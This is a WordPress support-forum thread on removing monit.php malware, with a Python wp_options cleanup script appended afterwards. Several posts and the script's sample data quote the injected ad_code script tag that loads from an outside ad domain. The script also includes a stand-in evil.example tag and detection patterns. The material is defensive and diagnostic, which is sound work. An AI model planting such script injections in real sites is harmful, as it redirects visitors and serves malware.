Support » Plugin: Anti-Malware Security and Brute-Force Firewall » DB Injection appears again and again…

  • Resolved theone211

    (@theone211)


    Hello,
    First, thanks for this perfect plugin, it helped me a lot and solved many problems with Malware and DB injections.

    My troubles began like this: Redirecting from my site when someone clicks on a picture, menu or anywhere. When I’m logged in as an admin, it doesn’t redirect. That’s why I didn’t notice the problem.
    2 days ago
    – Adwords disabled all ads (Malware detected)
    – Sucuri scanning: critical warning “?Rogueads – Malware”, infected file I think was “404javascript file”, I don’t remember the exact name. I could not find it anywhere on the server to delete it.

    Cleaning:
    PHASE 1. Wordfence – Found “Rogueads – Malware issue” – DELETED – After cleaning Sucuri Rogueads Malware appeared again.
    PHASE 2. after that I checked with your plugin and found this:
    cache/…/3rd-party dir found “pushsar.com-pfe-current-tag.min” – deleted
    plugins/root dir found “monit.php” (Monitization plugin) – deleted
    “admin_ips.txt” with all my admin IP addresses written in it – deleted
    DB Injections: NtBiZLQDoptions:361339:"ad_code" <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script> – DELETED
    After all this, NO warning from Sucuri 🙂

    BUT on new scan:
    PHASE 1. Wordfence does not detect anything.
    PHASE 2. Your plugin AGAIN detects ONLY DB Injections: NtBiZLQDoptions:361339:"ad_code" <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script> – DELETED
    The “admin_ips.txt” file is also created AGAIN – I don’t know if it’s normal for this file to be created at all.

    I’m losing my nerve with this malware.

    Thank you in advance 🙂

    • This topic was modified 11 months, 1 week ago by theone211.
  • @sahilkumargaba

    If you are offering to remove monit.php you should make it clear that you are charging a fee.

    Plugin Author Eli

    (@scheeeli)

    @sahilkumargaba,
    If you are charging a fee and are unwilling to admit that on this forum then you already know that this is not the place for your post. If you have a solution that you would like to share with others here then please post the full details of your solution here.

    Also, please note that my plugin can also automatically fix this threat and completely remove the malware from your site if you have the latest definition updates, so what are you offering that they cannot already get for free from my plugin?

    Hello dev. @scheeeli
    Many thanks for your plugin. You saved my website.
    Fixed. Cleaned all: monit.php and SQL injection!
    I recommend this plugin to everyone!

    Edit: However, I would like to know how this malware got on our sites! If anyone can clarify.

    • This reply was modified 10 months, 1 week ago by Pablito.

    @josecarlostf Hi, can you please help me with “after running scan, the URL is still injected in DB, usually can be found in information_schema process table. No harm is being done at this point but Google will still read the malicious URL.” I managed to clean the page and DB, the only instance left is this one in information_schema -> PROCESSLIST. I need to re-enable my Google Ads ASAP. Thank you so much!

    @yovosi If the information remains within the schema process list it shouldn’t do any harm. What you need to do is identify the URL where Google picks up the malicious URL. There is a chance that the URL doesn’t exist, so you might need to load an empty HTML page (without code) so that when Google picks up the site again it will be able to verify that it’s clean.

    Just insist with Google support to provide the URL.

    Some additional advice:
    Update WordPress
    Make sure all plugins are from verified sources (uninstall if you have any suspicious plugins).

    @kogluxury it usually originates from cracked plugins or themes, just make sure your site uses original files downloaded from the author site.

    @josecarlostf Excellent, thank you. That’s good news as I was looking for ways to remove it from information schema, but probably it can’t be done.

    @kogluxury Yes, what @josecarlostf said. I made the mistake of installing a nulled plugin and there was some malicious addition in it, which I probably wouldn’t even have detected if it weren’t for the Google Ads rejection. I did however learn a loooot (and slept not so much :D) in the process regarding webpage management, WP structure, PHP, MySQL,… 🙂

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Forum Moderator & Support Team Volunteer

    @sahilkumargaba

    Please do not ask for off forum contact.

    Forum Guidelines

    You’ve been placed on “modwatch” until we’re convinced such postings have stopped. Your account has *not* been banned, we just want to check things for a while before they’re public. If you wish to take issue with this, contact moderators via the #forums channel on slack (https://make.wordpress.org/slack).

    Plugin Author Eli

    (@scheeeli)

    @josecarlostf,
    Just wanted to say thanks for your contribution here. Your advice is spot-on and I want to agree with you on all points.

    I especially want to reinforce that downloading plugins from an unofficial source is the easiest way to get your site hacked 😉

    Hey,
    happy to find this post!

    So I’m having this virus too. I know how it appeared. I downloaded nulled themes from free websites (I wanted to test out a few themes before making a purchase decision on Envato! Bad decision!)

    How I found it? I was navigating my website and I saw popup appearing on the top right corner.

    I reset my WP install using the WP Reset plugin, but I’m not sure it’s enough, even with a database cleanup plugin.
    To be on the safe side I just deleted my server instance and created a new one with a fresh install.

    I will not download anything WordPress related from an unofficial source!

    There seems to be a solution here:
    https://bitofwp.com/security/how-to-trace-and-clean-the-monit-php-hack/

    Apart from cleaning all of your WordPress site files from the malware redirect hack and deleting the monit.php file under the plugins directory, you will also need to access your database using phpMyAdmin, then browse to your wp_options database table and search for the following option_name records:

    default_mont_options
    ad_code
    hide_admin
    hide_logged_in
    display_ad
    search_engines
    auto_update
    ip_admin
    cookies_admin
    logged_admin
    log_install
    Finally, if you find any of those records present, delete them, but first make sure you have created a backup of your WordPress site (both the site files and its MySQL database).

    The last step is to remove the admins_ip.txt file found in the plugins directory as well.
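    The wp_options lookup described in the steps above can be done over an exported copy of the table before anything is deleted. This is an added illustration, not code from the thread or the bitofwp.com article: it flags rows whose option_name is on the list quoted above, rows whose value embeds an external script tag (the ad_code injection reported at the top of the thread), and plugin-directory files named monit.php or the admin IP text file (both spellings from the thread), then builds the DELETE statement to run only after a backup has been taken. The sample rows are constructed.

```python
import re

# option_name values the quoted bitofwp.com write-up attributes to the monit.php malware
MONIT_OPTION_NAMES = {
    "default_mont_options", "ad_code", "hide_admin", "hide_logged_in",
    "display_ad", "search_engines", "auto_update", "ip_admin",
    "cookies_admin", "logged_admin", "log_install",
}
# Files reported under wp-content/plugins in this thread (both spellings appear on the page).
MONIT_FILE_NAMES = {"monit.php", "admin_ips.txt", "admins_ip.txt"}
# <script ... src="//host/..."> or src="http(s)://host/..." inside an option value
EXTERNAL_SCRIPT_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.IGNORECASE)


def find_suspect_options(rows):
    """rows: iterable of (option_id, option_name, option_value) from wp_options.
    Returns a list of (option_id, option_name, reason) for rows worth reviewing."""
    hits = []
    for option_id, name, value in rows:
        if name in MONIT_OPTION_NAMES:
            hits.append((option_id, name, "known monit.php option name"))
            continue
        m = EXTERNAL_SCRIPT_RE.search(value or "")
        if m:
            hits.append((option_id, name, f"external <script> to {m.group(1)}"))
    return hits


def find_suspect_plugin_files(paths):
    """paths: file paths relative to wp-content/plugins; returns the ones named like the dropped files."""
    return sorted(p for p in paths if p.rsplit("/", 1)[-1] in MONIT_FILE_NAMES)


def deletion_sql(hits, table="wp_options"):
    """DELETE for the flagged rows, to run only after a full backup. option_id is an integer column."""
    ids = ",".join(str(int(h[0])) for h in hits)
    return f"DELETE FROM {table} WHERE option_id IN ({ids});" if ids else ""


# Constructed sample export; the ad_code row mirrors the injection quoted in the thread.
SAMPLE_ROWS = [
    (1, "siteurl", "https://example.com"),
    (361339, "ad_code", '<script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async></script>'),
    (361340, "hide_admin", "1"),
    (5, "blogdescription", "Just another site"),
    (7, "widget_text", '<script src="https://evil.example/x.js"></script>'),
]

if __name__ == "__main__":
    for hit in find_suspect_options(SAMPLE_ROWS):
        print(hit)
    print(deletion_sql(find_suspect_options(SAMPLE_ROWS)))
```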
